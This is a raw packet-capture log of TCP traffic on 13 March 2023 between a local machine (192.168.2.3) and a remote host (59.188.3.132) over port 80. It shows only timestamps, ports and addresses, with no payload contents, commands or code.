                                                                                                                                                              Mar 13, 2023 05:27:32.863826990 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.863887072 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.031184912 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.036861897 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.036930084 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.037002087 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.037004948 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.037048101 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.037065029 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.037094116 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.037163973 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.067836046 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.067938089 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.067986965 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.068067074 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.068146944 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.068197012 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.068232059 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.068311930 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.068396091 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.068412066 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.068542957 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.068589926 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.068623066 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.234071016 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.241561890 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.241622925 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.241672993 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.241710901 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.241722107 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.241770983 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.241801977 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.241929054 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.241992950 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.270898104 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.271029949 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.271080017 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.271127939 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.271132946 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.271178007 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.271188974 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.271291018 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.271363020 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.271383047 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.271531105 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.271606922 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.279103994 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.279266119 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.388514042 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.388715982 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.436943054 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.444689989 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.444758892 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.444792032 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.444876909 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.444884062 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.444941044 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.445041895 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.445089102 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.445153952 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.445175886 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.473820925 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.473922014 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.473970890 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.473994017 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.474018097 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.474051952 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.474175930 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.474236965 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.474262953 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.474345922 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.474405050 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.474461079 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.474569082 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.474643946 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.482294083 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.482371092 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.482445002 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.482445002 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.515341043 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.591558933 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.591619968 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.591749907 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.593930960 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.647733927 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.647813082 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.647864103 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.647905111 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.647913933 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.647999048 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.648062944 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.648149014 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.648228884 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.676630974 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.676687002 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.676733971 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.676814079 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.676852942 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.676914930 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.676997900 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.677047014 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.677113056 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.677161932 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.677310944 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.677373886 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.677453995 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.677499056 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.677553892 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.685348034 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.685409069 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.685455084 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.685478926 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.685478926 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.685534954 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.685580969 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.685652971 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.717758894 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.717909098 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.718564034 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.794589043 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.794651031 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.794759989 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.796509027 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.796705008 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.796760082 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.796792984 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.796825886 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.827877998 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.850857973 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.850920916 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.850972891 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.851021051 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.851022959 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.851078033 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.851171970 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.851258993 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.851330996 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.879556894 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.879622936 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.879672050 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.879719019 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.879730940 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.879762888 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.879775047 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.879903078 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.879960060 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.880043030 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.880131960 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.880203009 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.880233049 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.880273104 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.880326033 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.888298035 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.888458967 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.888510942 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.888556004 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.888567924 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.888624907 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.888669968 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.888784885 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.888854027 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.888930082 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.889013052 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.920896053 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.920968056 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.921083927 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.921083927 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.997689962 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.997752905 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.997802019 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.997848988 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.997864962 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.997920990 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.997977018 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.999509096 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.999624014 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:33.999634027 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:33.999726057 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.030921936 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.030989885 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.031075954 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.053850889 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.053908110 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.054049969 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.054055929 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.054163933 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.054235935 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.054239988 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.054316044 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.054375887 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.091711044 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.091839075 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.091902971 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.091978073 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.124437094 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.124499083 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.124619961 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.124628067 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.124696970 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.202492952 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.202558041 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.202625036 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.202670097 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.233922958 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.233989954 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.234097004 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.257267952 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.294822931 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.294882059 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.295018911 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.327476025 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.327537060 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.327584028 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.327658892 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.327903032 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.329879999 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.405556917 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.405616999 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.405730963 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.497858047 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.497919083 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.497965097 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.498059988 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.501384974 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.530608892 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.530673981 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.530846119 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.532700062 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.532759905 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.532900095 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.609060049 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.609131098 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.609220982 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.700962067 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.701037884 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.701123953 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.704370022 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.704420090 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.704493046 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.733707905 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.733761072 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.733838081 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.735744953 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.735852957 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.735934019 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.812027931 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.812092066 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.812227964 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.859200001 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.904061079 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.936698914 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.936793089 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.936837912 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.936906099 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:34.938755989 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.938815117 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:34.938901901 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.015074015 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.015146971 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.015232086 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.015301943 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.015463114 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.046808004 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.062230110 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.124875069 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.139729977 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.139792919 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.139875889 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.141758919 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.141808987 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.141905069 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.218339920 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.218406916 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.218568087 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.249666929 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.249881029 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.328142881 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.343380928 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.343445063 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.343543053 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.345504045 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.345567942 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.345628023 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.421549082 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.421616077 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.421667099 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.421713114 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.421785116 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.452826977 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.452894926 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.452940941 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.453008890 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.546525955 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.546590090 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.546704054 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.548393965 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.548445940 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.548589945 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.624710083 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.624777079 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.624825001 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.624870062 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.624944925 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.624944925 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:35.655994892 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:35.656061888 CET804970259.188.3.132192.168.2.3
